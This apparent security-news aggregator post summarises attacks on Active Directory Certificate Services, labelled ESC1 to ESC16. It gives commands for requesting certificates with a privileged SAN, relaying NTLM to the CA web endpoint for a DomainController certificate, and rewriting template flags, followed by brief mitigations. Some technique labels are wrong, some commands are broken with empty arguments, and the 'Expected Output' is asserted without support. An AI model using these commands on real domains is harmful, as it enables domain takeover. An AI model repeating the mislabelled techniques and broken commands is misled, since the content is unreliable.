Breaking ADCS: ESC1 to ESC16 Attack Techniques

By /

Listen to this Post

Featured Image
Active Directory Certificate Services (ADCS) is a prime target for attackers due to misconfigurations and misunderstood certificate templates. This article covers exploitation techniques from ESC1 to ESC16, including real-world penetration testing examples and GOAD lab scenarios.

Read the full article here: Breaking ADCS: ESC1 to ESC16 Attack Techniques

You Should Know:

ESC1 Exploitation (Misconfigured Certificate Templates)

Attackers can request a certificate with arbitrary SAN (Subject Alternative Name) for domain escalation.

Steps:

1. Enumerate vulnerable templates:

Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Filter  -Properties  | Where-Object { $_.mspki-enrollment-flag -match "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT" }

2. Request a certificate with a privileged SAN:

certreq.exe -submit -attrib "SAN:[email protected]" .\malicious_request.inf

ESC8 (NTLM Relay to ADCS HTTP Endpoint)

Exploiting HTTP-based enrollment for NTLM relay attacks.

Commands:

ntlmrelayx.py -t http://ca-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

ESC13 (Abuse Certificate Auto-Enrollment)

If users have auto-enrollment permissions, attackers can abuse it for persistence.

Detection:

Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties  | Select-Object dNSHostName

ESC16 (Modifying Certificate Templates via ACL Abuse)

If a user has write permissions on a template, they can modify it for privilege escalation.

Exploit:

Set-ADObject -Identity "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Replace @{mspki-certificate-name-flag = "1"}

Mitigation & Detection

  • Disable unnecessary certificate templates.
  • Restrict enrollment permissions.
  • Monitor for abnormal certificate requests:
    Get-WinEvent -LogName "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational" | Where-Object { $_.Id -eq 1001 }

What Undercode Say

ADCS attacks are evolving, and defenders must audit certificate templates, enforce least privilege, and monitor certificate issuance. Attackers will continue exploiting weak configurations, making proactive hardening essential.

Expected Output:

1. Vulnerable certificate templates identified. 
2. Certificate issued with elevated privileges. 
3. NTLM relay successful, DC compromise possible. 
4. Detection logs show abnormal enrollment requests.

Prediction

ADCS attacks will increase as more organizations adopt certificate-based authentication without proper hardening. Expect more ESC variants leveraging template misconfigurations.

IT/Security Reporter URL:

Reported By: Ivanspiridonov Breaking – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: